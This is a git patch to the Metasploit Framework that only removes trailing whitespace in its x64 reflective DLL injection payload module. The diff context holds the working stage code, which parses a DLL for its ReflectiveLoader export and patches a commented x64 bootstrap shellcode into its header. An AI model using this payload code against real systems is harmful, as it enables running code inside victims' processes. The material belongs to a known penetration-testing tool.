From 441c5a22abcf1565c2efad54724104fa0078ebd6 Mon Sep 17 00:00:00 2001
From: James Lee
Date: Sun, 20 Nov 2011 12:00:07 +1100
Subject: [PATCH] more spaces at EOL
---
 .../windows/x64/reflectivedllinject.rb | 40 +++++++++----------
 1 file changed, 20 insertions(+), 20 deletions(-)
diff --git a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
index b6569a1be3..8dead1bd56 100644
--- a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
@@ -25,20 +25,20 @@ module Payload::Windows::ReflectiveDllInject_x64
 'References' => [ [ 'URL', 'http://www.harmonysecurity.com/ReflectiveDllInjection.html' ] ],
 'Platform' => 'win',
 'Arch' => ARCH_X86_64,
- 'PayloadCompat' =>
- {
+ 'PayloadCompat' =>
+ {
 'Convention' => 'sockrdi'
 },
- 'Stage' =>
- {
- 'Offsets' =>
- {
- 'EXITFUNC' => [ 47, 'V' ]
- },
- 'Payload' => ""
+ 'Stage' =>
+ {
+ 'Offsets' =>
+ {
+ 'EXITFUNC' => [ 47, 'V' ]
+ },
+ 'Payload' => ""
 }
 ))
-
+
 register_options( [ OptPath.new( 'DLL', [ true, "The local path to the Reflective DLL to upload" ] ), ], self.class )
 end
@@ -49,12 +49,12 @@ module Payload::Windows::ReflectiveDllInject_x64
 def stage_payload
 dll = ""
 offset = 0
-
+
 begin
 ::File.open( library_path, "rb" ) { |f| dll += f.read(f.stat.size) }
 pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
-
+
 pe.exports.entries.each do |entry|
 if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
 offset = pe.rva_to_file_offset( entry.rva )
@@ -62,21 +62,21 @@ module Payload::Windows::ReflectiveDllInject_x64
 end
 end
- raise "Can't find an exported ReflectiveLoader function!" if offset == 0
+ raise "Can't find an exported ReflectiveLoader function!" if offset == 0
 rescue
 print_error( "Failed to read and parse Dll file: #{$!}" )
 return
 end
-
+
 exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration
-
+
 bootstrap = "\x4D\x5A" + # pop r10 ; pop r10 = 'MZ'
 "\x41\x52" + # push r10 ; push r10 back
 "\x55" + # push rbp ; save ebp
 "\x48\x89\xE5" + # mov rbp, rsp ; setup fresh stack frame
 "\x48\x81\xEC\x20\x00\x00\x00" + # sub rsp, 32 ; alloc some space for calls
 "\x48\x8D\x1D\xEA\xFF\xFF\xFF" + # lea rbx, [rel+0] ; get virtual address for the start of this stub
- "\x48\x81\xC3" + [offset].pack( "V" ) + # add rbx, 0x???????? ; add offset to ReflectiveLoader
+ "\x48\x81\xC3" + [offset].pack( "V" ) + # add rbx, 0x???????? ; add offset to ReflectiveLoader
 "\xFF\xD3" + # call rbx ; call ReflectiveLoader()
 "\x48\x89\xC3" + # mov rbx, rax ; save DllMain for second call
 "\x49\x89\xF8" + # mov r8, rdi ; R8 = our socket
@@ -88,21 +88,21 @@ module Payload::Windows::ReflectiveDllInject_x64
 "\x5A" + # pop rdx ; signal we have detached
 "\xFF\xD3" # call rbx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk )
 # the DOS headers e_lfanew entry will begin here at offset 64.
-
+
 # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
 if( bootstrap.length > 62 )
 print_error( "Reflective Dll Injection (x64) generated an oversized bootstrap!" )
 return
 end
-
+
 # patch the bootstrap code into the dll's DOS header...
 dll[ 0, bootstrap.length ] = bootstrap
 # return our stage to be loaded by the intermediate stager
 return dll
 end
-
+
 end
-end
+end